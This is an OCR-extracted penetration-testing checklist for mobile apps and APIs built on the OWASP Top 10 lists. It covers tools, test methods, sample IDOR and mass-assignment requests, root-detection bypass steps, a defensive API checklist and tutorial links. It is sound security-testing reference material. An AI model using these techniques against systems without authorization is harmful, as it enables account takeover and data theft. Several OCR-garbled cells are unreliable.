M4-01	Remember Credentials Functionality (Persistent authentication)	Issue
M4-02	Client Side Based Authentication Flaws	Issue
M4-03	Session invalidation on Backend	Issue
M4-04	Session Timeout Protection	Issue
M4-05	Cookie Rotation	Issue
M4-06	Multiple concurrent logins	Issue
M4-07	Exposing Device Specific Identifiers in Attacker Visible Elements	Issue
M5. Insufficient Cryptography	Test Name	Result
M5-01	Cryptographic Based Storage Strength	Issue
M5-02	Poor key management process	Issue
M5-03	Use of custom encryption protocols	Issue
M5-04	Token/Session Creation and handling	Issue
M6. Insecure Authorization	Test Name	Result
M6-01	Client Side Authorization Breaches	Issue
M6-02	Insecure Direct Object references	Issue
M6-03	Missing function level access control	Issue
M6-04	Bypassing business logic flaws	Issue
M7 Client Code Quality	Test Name	Result
M7-01	Content Providers: SQL Injection and Local File Inclusion	Issue
M7-02	Broadcast Receiver	Issue
M7-03	Service component	Issue
M7-04	Insufficient WebView hardening	Issue
M7-05	Injection (SQLite Injection, XML Injection)	Issue
M7-06	Local File Inclusion through NSFileManager or Webviews	
M7-07	Abusing URL schemes or Deeplinks	
И7-08	Sensitive Information Masking	Issue
M9 Code Tempering	Too! Name	Poor!t
M8. Code Tampering	Test Name	Result
M8-01 M8-02	Unauthorized Code Modification	Issue

M8-03	Rooted or Jail-broken device checking	Issue
M9. Reverse Engineering	Test Name	Result
M9-01	Reverse Engineering the Application Code (Code Obfuscating Checking)	Issue
M9-02	Information leakage/Hardcoded credential in the binaries	Issue
M10. Extraneous Functionality	Test Name	Result
M10-01	Debuggable Application	Issue
M10-02	Passwords/ Connection String disclosure	Issue
M10-03	Hidden and Unscrutinised functionalities	Issue

bileApp_PT						
cklist	Penetration	testing checklist based on OWASP Top	10 Mobile 20	116		
	Felletiation	testing checklist based on OWASF TOP	TO MODILE 20	710		
				Applicable		
	Test Name	Description	Tool	Platform	OWASP	Resul
			apktool,			
	Reverse Engineering the Application Code		dex2jar, Clutch,			
	(Code Obfuscating Checking)	Disassembling and Decompiling the application	Classdump	All	M9	Issue
	Information leakage/Hardcoded credential	Identify sensitive information through binary/source	string, jdgui,			
	in the binaries	code	IDA, Hopper	All	M9	Issue
	Unauthorized Code Modification	Static code modification, Binary patching, Bypass check sum mechanism	apktool, Hopper	All	M8	Issue
	Chadhonzod Code Modification	Shook sum moonamem	apktool,	7 (1)	IVIO	10000
	Misuse of App permissions	Identify excessive App permissions	MobSF	Android	M1	Issue
	land of OO backs that a Alleger	Identify "minSdkVersion" on apktool.yml, the value be		A.II		
	Insecure version of OS Installation Allowed	set over than 17. For iOS, identify minOS using idb.	apktool, idb MobSF	All	M1	Issue
			Wiodoi			
	Abusing Android Components through IPC		Androidmanife			
	intents ("exported" and "intent-filter")	Identify android exported components	st.xml	Android	M1	Issue
			apktool			
		Check "android:allowBackup" attribute which should	Androidmanife			
	Unrestricted Backup file	be set to "false"	st.xml	Android	M2	Issue
			jdgui, MobSF,			
	Country and the Daniel Standard Standard	Identify insecure/deprecated cryptographic algorithms	Qark, Hopper, iFunbox	A.II	ME	laaa
	Cryptographic Based Storage Strength	(RC4, MD5, SHA1) on sourcecode	jdgui, MobSF,	All	M5	Issue
		Identify hardcoded key in application or Keys may be	Qark, Hopper,			
	Poor key management process	intercepted via Binary attacks	iFunbox	All	M5	Issue
			jdgui, MobSF,			
04-41-	Use of custom encryption protocols	Identify implementing their own protocol	Qark, Hopper, iFunbox	All	M5	Issue
Static nalysis	Debuggable Application	Identify "android:debuggable" attribute	adb. MobSF	Android	M10	Issue
ilalysis	Debuggable Application	identity android.debuggable attribute	aub, MobSi	Alidioid	IVITO	13300
				Applicable		
	Test Name	Description	Tool	Platform	OWASP	Resul
		Identify misuse of Data protection API on Keychain,				
	Misuse of Keychain , Touch ID and other	Misuse of TouchID (Retrieve credentials from Local	iDovice	:00	N44	looue
	security related controls Minimum Device Security Requirements	Storage, Local Authen) Ensure that app cannot execute when the PIN or	iDevice	iOS	M1	Issue
	absent	Pattern lock is not enabled.	Device	All	M1	Issue
			adb, idb,			
	Unencrypted Database files	Check encryption on database files	iFunbox	All	M2	Issue
		Identify Sensitive Data on Shared Storage, SD card				
	Insecure Shared Storage	storage encryption, Shared preferences MODE WORLD READABLE	adb	Android	M2	Issue
	module charge charge		adb, idb,	7 11 10 10 10		10000
			iFunbox,			
		Identify Sensitive Data in application files (application	BinaryCookie			
	Insecure Application Data Storage	log, Cache file, Cookie)	Reader adb logcat,	All	M2	Issue
			idb.			
	Information Disclosure through		libimobiledevic			
	Logcat/Apple System Log (ASL)	Identify sensitive information through application log	е	All	M2	Issue
	Application Declaration (Consended)	Identify application snapshot/screenshot	Device,	A.II	MO	laarra
	Application Backgrounding (Screenshot)	backgrounding Identify disabling Copy/Paste function for sensitive	iFunbox	All	M2	Issue
	Copy/Paste Buffer Caching	part of the application on EditText/UITextField	idb, iFunbox	All	M2	Issue
		Identify keyboard cache file located in:				
		/var/mobile/Library/Keyboard				
	Keyboard Press Cashing	/data/data/com.android.providers.	Device, idb,	AII	MO	loove
	Keyboard Press Caching	userdictionary/databases/user_dict.db For Android, Check "android:allowBackup" attribute	iFunbox apktool,	All	M2	Issue
		which should be set to "false"	iPhone			
		For iOS, Use iTune to backup application folder in	Backup			
	Unrestricted Backup file	order to check sensitive info from backup folder	Extractor	All	M2	Issue
	Remember Credentials Functionality (Persistent authentication)	Identify user's password or sessions on the device	adb, idb, iFunbox	All	M4	Issue
	(1 Graiatorit addirentication)	racinary user a passivoru or sessions on the device	adb, Drozer,	ΔII	IVIT	13500
			Cycript,			
		Perform binary attacks against the mobile app in	Snoop-it,			_
	Client Side Based Authentication Flaws	order to bypass offline authentication	Burpsuite	All	M4	Issue
		 Perform binary attacks against the mobile app and try	adb, Drozer,			
		to execute privileged functionality that should only be	Cycript, Snoop-it,			
	Client Side Authorization Breaches	executable with a user of higher privilege	Burpsuite	All	M6	Issue
	Content Providers: SQL Injection and					
	Local File Inclusion	Identify SQLi and LFI on Content provider component	Drozer	Android	M7	Issue
		Identify intent-filter on broadcast and receiver component in order to directly access and sniff the				
	į.		1 _	A dans tol	147	
	Broadcast Receiver	information	Drozer	Android	M7	Issue

1		Identify misconfiguration on "android.webkit.				
		WebSettings"				
		(Javascript/File access/Plugins), XSS through	<u>.</u> .			
	Insufficient WebView hardening	UIWebview	jdgui, iDevice	All	M7	Issue
			adb, iDevice,			
	Injection (SQLite Injection, XML Injection)	Identify SQLi and XMLi on application	Burpsuite	All	M7	Issue
		Check LFI on application(/,//blah\0) Webviews				
	Local File Inclusion through Webviews	FileAccess attack through setAllowFileAccess	idgui, iDevice	All	M7	Issue
	· ·	For iOS: Identify URL schemes through info.plist and	1			
		Clutch+Strings to obtain URL scheme structures				
		For Android: Identify URL schemes through source	apktool, jdgui,			
	Abusing URL schemes or Deeplinks	code or manifest file	Clutch, Strings	All	M7	Issue
	Abdolling OTAL scrientes of Deeplinks	Identify sensitive information masking (Creditcard no.	Device.	7311	IVI7	13300
	Consitius Information Maskins		,	A II	147	laaa
	Sensitive Information Masking	on UI and HTTPs traffic)	Burpsuite	All	M7	Issue
			Frida, Cycript,			
	Runtime Manipulation	Run-time manipulation, Method swizzling	Snoop-it	All	M8	Issue
		Detect root/jb detection code in the reverse				
		engineered app file.If found, delete/ change the				
		access control of the file containing the code and				
		restart the app. Or Install tools like hidemyroot and	tsProtector.			
	Rooted or Jail-broken device checking	run the apps	RootCloak2	All	M8	Issue
		Identify sensitive information (Credential) between	jdgui,			
Dynamic and	Passwords/ Connection String disclosure	mobile and API	Burpsuite	All	M10	Issue
Runtime		Identify extraneous functionality (Hidden back-end	jdgui,			
analysis	Hidden and Unscrutinised functionalities	URL)	Burpsuite	All	M10	Issue

	Test Name	Description	Tool	Applicable Platform	OWASP	Result
		Observe the device's network traffic through a proxy				
	Insecure Transport Layer Protocols	that SSL is implemented or not	Burpsuite	All	M3	Issue
			testssl.sh,			
	Use of Insecure and Deprecated		Qualys SSL			
	algorithms	Identify SSL/TLS Encryption Algorithms	Labs	All	M3	Issue
		Allow tester to intercept SSL traffic without Certificate	jdgui, MobSF,			
	Use of Disabling certificate validation	installation (checkServerTrusted with nobody)	Qark	All	M3	Issue
		Check whether application accepts a certificate from any trusted CA (Burpsuite) or not. E.g. Check				
		setAllowsAnyHTTPSCertificate(iOS) and	jdgui, MobSF,			
Communicati	SSL pinning Implementation	AllowAllHostnameVerifier(Android)	Qark	All	M3	Issue
	End-to-end encryption	Identify end-to-end encryption on application layer	Burpsuite	All	M3	Issue

	Test Name	Description	Tool	Applicable Platform	OWASP	Result
	Excessive port opened at Firewall	Identify opened port at Server-side URL/IP Address	Nmap	All	M1	Issue
	Default credentials on Application Server	Identify default credentials on Backend server (e.g. Tomcat Application server using tomcat/tomcat, admin/tomcat)	Web Browser	All	M1	Issue
	Weak password policy Implementation	Identify weak password policy implementation both mobile and server side (e.g. Bypass password complexity checking on UI)	Burpsuite	All	M1	Issue
	Exposure of Webservices through WSDL document	Identify webservices help pages (*.asmx) which show methods and structure	Web Browser	All	M1	Issue
	Security Misconfiguration on Server API	Identify webserver configuration (e.g. Error handling, HTTP response banner)	Web Browser, Burpsuite	All	M1	Issue
	Security Patching on Server API	Identify vulnerability on server API	Nessus	All	M1	Issue
	Input validation on API	Check input validation (e.g. SQL Injection, XXE) on API/Webservices	Burpsuite	All	M1	Issue
	Information Exposure through API response message	Identify sensitive information on API response message/header	Burpsuite	All	M1	Issue
	Control of interaction frequency on API (Replay Attack)	Conduct simultaneous attack on API (e.g. OTP, email sending)	Burpsuite (Intruder)	All	M1	Issue
	Session invalidation on Backend	Ensure that all session invalidation events are executed on the server side and not just on the mobile app	Burpsuite	All	M4	Issue
	Session Timeout Protection	Mobile app must have adequate timeout protection on the backend components	Burpsuite	All	M4	Issue
	Cookie Rotation	Ensure that reset cookies is properly implemented during authentication state changes (Anonymous<->User, User A<->User B, Timeout)	Burpsuite	All	M4	Issue
	Multiple concurrent logins	Simultaneously login from multiple device with the same credential	Burpsuite	All	M4	Issue
	Exposing Device Specific Identifiers in Attacker Visible Elements	Observe the device's network traffic through a proxy that Device's information (UDID) is sent during the transmission or not.	Burpsuite	All	M4	Issue
	Token/Session Creation and handling	They should be standard algorithm, sufficiently long, complex, and pseudo-random so as to be resistant to guessing/anticipation attacks.	Burpsuite	All	M5	Issue
	Insecure Direct Object references	Directly access unauthorised object/var through HTTPs traffic	Burpsuite	All	M6	Issue
Server Side -	Missing function level access control	Directly access unauthorised function through HTTPs traffic	Burpsuite	All	M6	Issue
Webservices and API	Bypassing business logic flaws	Bypass business logic data validation, Circumvention of Work Flows	Burpsuite	All	M6	Issue

S NO	OWASP Top 10 API	Approach	Hackerone reports for reference
		- User Id 718492 rating his ride, Intercept the request, Change the id to 718493	
		in the database it will update like user 718493 is rating his ride	
		- Based on Userid & Object id	
		Profile controller - User #585 has access to update profile #616 POST /update profile	
		{"user_id":616, "email":"dupakur@gmail.com"}	
		, - , - ,	
		Receipts Controller - User #232 has access to view receipt #777	
		Get /receipts/777	
		Admin Panel Controller - Admin #616 has access to delete user #888	
	A1 - BOLA (Broken Object Level	DELETE /admin/delete_user?user_id=888	Uber full account takover by Anand prakash
1	Authorization)		(appsecure)
		Detection areas: Forgetpassword, weblogin, get_location, update_picture	
		rate limiting	Facebook - full account takeover - Anand
		Misconfiguration: JWT allows, tokens dont expire etc	Prakash
			reset password token 5digit value -
2	A2 - Broken User Authentication	Extra protection: Account lockout, captcha, bruteforce attacks	predictable
		Apis Expose sensitive data (PII) of other users by design	
3	A3 - Excessive Data exposure	GET /allusersinfo GET /match users?from=0	3fun app - by Alex Iomas (pentestpartners)
			The second of the second secon
		Might lead to dos	
	A4 - Lack of resources & rate	limit the requests value	
4	limiting	Rate limiting absent	https://hackerone.com/reports/170310
		Alice of the Book	
		Admin, riders, Drivers	
		privilege escalation - Horizontal & vertical	
		eg: if a rider can able to delete admin ID	
		English way to detect	@uzsunny reported that by creating two
		Easiest way to detect - 1) Fetch users profile	partner accounts sharing the same business email, it was possible to be
		Get /app/users_view.aspx?user_id=1337	granted "collaborator" access to anystore
			without any merchant interaction in shopify
		2) Delete user by admin function	application
5	A5 - Broken Function level Authorization (BFLA)	POST app/admin_panel/users_mgmt.aspx action=delete&user id=1337	The code did not properly check What type the existing account was
	Authorization (b) EA)	action-delete&d3et_id=1337	the existing account was
		Create user - traditional flow	
		1) Legitimate request:	
		Post /api/users/new {"username":"Inon", "pass":"123456"}	kerone.com/reports/9942 Users can enable API Access for free via mass
		(username : mon , pass : 123430 }	Assignment
		2) Malicious	Found by Jameskettle (portswigger) in new
		Post /api/users/new	relic program
		{"username":"Inon", "pass":"123456", "role"="admin"}	DOCT / www. ats/ www. ats its income
		Easier to exploit in APis	POST /accounts/ <account_id>.json</account_id>
		Always try with GET, POST, PUT & PATCH	account [firstname]="evil" &
6	A6 -Mass Assignment	User Mass assignment to bypass other Security Controls	account[allow_api_access]=true
		Hardcoded Passwords	
		lack of csrf/cors protection	
		lack of security http headers unnecessary exposed http methods	
		weak encryption	
7	A7 - Security Misconfiguration	etc	https://hackerone.com/reports/426165
8	A8 - Injection	SQL, NoSQL, BlindSQL, commandinjection etc	https://hackerone.com/reports/768195
	į.	Astrophysias What discounted	
		Api endpoints with no documentation	
		1 ' '	
		Legitimate endpoints	
		1 ' '	
		Legitimate endpoints /v1/get_user/ /v2/update_location	
		Legitimate endpoints /v1/get_user/ /v2/update_location Non-legitimate	
		Legitimate endpoints /v1/get_user/ /v2/update_location	
		Legitimate endpoints /v1/get_user/ /v2/update_location Non-legitimate /v0/b2b_old/export_all_users	
		Legitimate endpoints /v1/get_user/ /v2/update_location Non-legitimate /v0/b2b_old/export_all_users finding unknown api hosts	https://apisecurity
		Legitimate endpoints /v1/get_user/ /v2/update_location Non-legitimate /v0/b2b_old/export_all_users	https://apisecurity. io/encyclopedia/content/owasp/api9-
9	A9 - Improper Asset Management	Legitimate endpoints /v1/get_user/ /v2/update_location Non-legitimate /v0/b2b_old/export_all_users finding unknown api hosts payment-api.acme.com	
9		Legitimate endpoints /v1/get_user/ /v2/update_location Non-legitimate /v0/b2b_old/export_all_users finding unknown api hosts payment-api.acme.com mobile-api.acme.com	io/encyclopedia/content/owasp/api9-
9	A9 - Improper Asset Management A10 - Insufficient Logging & Monitoring	Legitimate endpoints /v1/get_user/ /v2/update_location Non-legitimate /v0/b2b_old/export_all_users finding unknown api hosts payment-api.acme.com mobile-api.acme.com	io/encyclopedia/content/owasp/api9-

1	Task
	Authentication
EALOE	Don't use Basic Auth. Use standard authentication instead (e.g. JWT, OAuth).
FALSE	Don't reinvent the wheel in Authentication, token generation, password storage. Use the standards.
FALSE	Use Max Retry and jail features in Login.
FALSE	Ose Max Retry and Jali Teatures in Login.
	JWT (JSON Web Token)
FALSE	Use a random complicated key (JWT Secret) to make brute forcing the token very hard.
FALSE	Don't extract the algorithm from the header. Force the algorithm in the backend (HS256 or RS256).
FALSE	Make token expiration (TTL, RTTL) as short as possible.
TALOL	Don't store sensitive data in the JWT payload, it can be decoded easily.
FALSE	
	OAuth
FALSE	Always validate redirect_uri server-side to allow only whitelisted URLs.
FALSE	Always try to exchange for code and not tokens (don't allow response_type=token).
FALSE	Use state parameter with a random hash to prevent CSRF on the OAuth authentication process.
FALSE	Define the default scope, and validate scope parameters for each application.
	Access
FALSE	Limit requests (Throttling) to avoid DDoS / brute-force attacks.
FALSE	Use HTTPS on server side to avoid MITM (Man in the Middle Attack).
FALSE	Use HSTS header with SSL to avoid SSL Strip attack.
	Input
FALSE	Use the proper HTTP method according to the operation: GET (read), POST (create), PUT/PATCH (replace/update), and DELETE (to delete a record), and respond with 405 Method Not Allowed if the requested method isn't appropriate for the requested resource.
FALSE	Validate content-type on request Accept header (Content Negotiation) to allow only your supported format (e.g. application/xml, application/json, etc.) and respond with 406 Not Acceptable response if not matched.
FALSE	Validate content-type of posted data as you accept (e.g. application/x-www-form-urlencoded, multipart/form-data, application/json, etc.).
FALSE	Validate user input to avoid common vulnerabilities (e.g. XSS, SQL-Injection, Remote Code Execution, etc.).
FALSE	Don't use any sensitive data (credentials, Passwords, security tokens, or API keys) in the URL, but use standard Authorization header.
FALSE	Use an API Gateway service to enable caching, Rate Limit policies (e.g. Quota, Spike Arrest, or Concurrent Rate Limit) and deploy APIs resources dynamically.
	Processing
FALSE	Check if all the endpoints are protected behind authentication to avoid broken authentication process.
FALSE	User own resource ID should be avoided. Use /me/orders instead of /user/654321/orders.
FALSE	Don't auto-increment IDs. Use UUID instead.
EVICE	If you are parsing XML files, make sure entity parsing is not enabled to avoid XXE (XML external entity attack).
FALSE	If you are parsing XML files, make sure entity expansion is not enabled to avoid Billion Laughs/XML bomb
FALSE	via exponential entity expansion attack.
FALSE	Use a CDN for file uploads.

FALSE Do not forget to turn the DEBUG mode OFF. FALSE Output FALSE Send X-Content-Type-Options: nosniff header.	
FALSE Output FALSE Send X-Content-Type-Options: nosniff header.	
Output FALSE Send X-Content-Type-Options: nosniff header.	
FALSE Send X-Content-Type-Options: nosniff header.	
** .	
Cond V France Outliness down bonder	
Send X-Frame-Options: deny header. FALSE	
FALSE Send Content-Security-Policy: default-src 'none' header.	
FALSE Remove fingerprinting headers - X-Powered-By, Server, X-AspNet-Version, etc.	
Force content-type for your response. If you return application/json, then your content-type response. FALSE	nse is
FALSE Don't return sensitive data like credentials, Passwords, or security tokens.	
Return the proper status code according to the operation completed. (e.g. 200 OK, 400 Bad Requ Unauthorized, 405 Method Not Allowed, etc.).	est, 401
CI & CD	
FALSE Audit your design and implementation with unit/integration tests coverage.	
FALSE Use a code review process and disregard self-approval.	
Ensure that all components of your services are statically scanned by AV software before pushing production, including vendor libraries and other dependencies.	g to
Design a rollback solution for deployments. FALSE	
https://github.com/shieldfy/API-Security-Checklist	

[API Pentest Guide]

API hacking by Katie Paxton-Fear

https://youtu.be/qqmyAxfGV9c

https://www.youtube.com/watch?v=cWSu2Ja65Z4

https://www.youtube.com/watch?v=yCUQBc2rY9Y&list=PLbyncTkpno5HgX1h2MnV6Qt4wvTb8Mpol

HACKTIVITY

https://www.youtube.com/watch?v=zW8QF3x3oSU

https://www.youtube.com/watch?v=HXci0-NSwOs

API 101 - https://www.youtube.com/watch?v=ijalD2NkRFg

BADAPI - https://www.youtube.com/watch?v=UT7-ZVawdzA

Part1: Introduction | Enumeration | tools

https://www.youtube.com/watch?v=UD6n666nS8I

https://virgool.io/class313/%D9%85%D9%82%D8%AF%D9%85%D9%87-%D8%A7%DB%8C-%D8%A8%D8%B1-%D8%AA%D8%B3%D8%AA-%D9%86%D9%81%D9%88%D8%B0-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-os12uh6bbyy4

Part2: XXE | XPath Injection | APi sql injection

https://www.youtube.com/watch?v=AIBCOWRf38A

https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-xxexpath-injectionapi-sql-injection-nfudsdnvjlv4

Part3: Xml bomb | command Injection | XST | SSRF

https://www.youtube.com/watch?v=vKm_WHxczow&feature=youtu.be

https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-xml-bombcommand-injection-xst-ssrf-%D8%AF%D8%B1-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%D8%8C%D8%B3-%D9%87%D8%A7-htnh2lninb8c

Part4: CORS | SOME | JWT | IDOR

https://www.youtube.com/watch?v=NbJwjnoJr5g&feature=youtu.be

https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-corssomejwtidor-%D8%AF%D8%B1-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-%D9%87%D8%A7-xwm2fkivu3so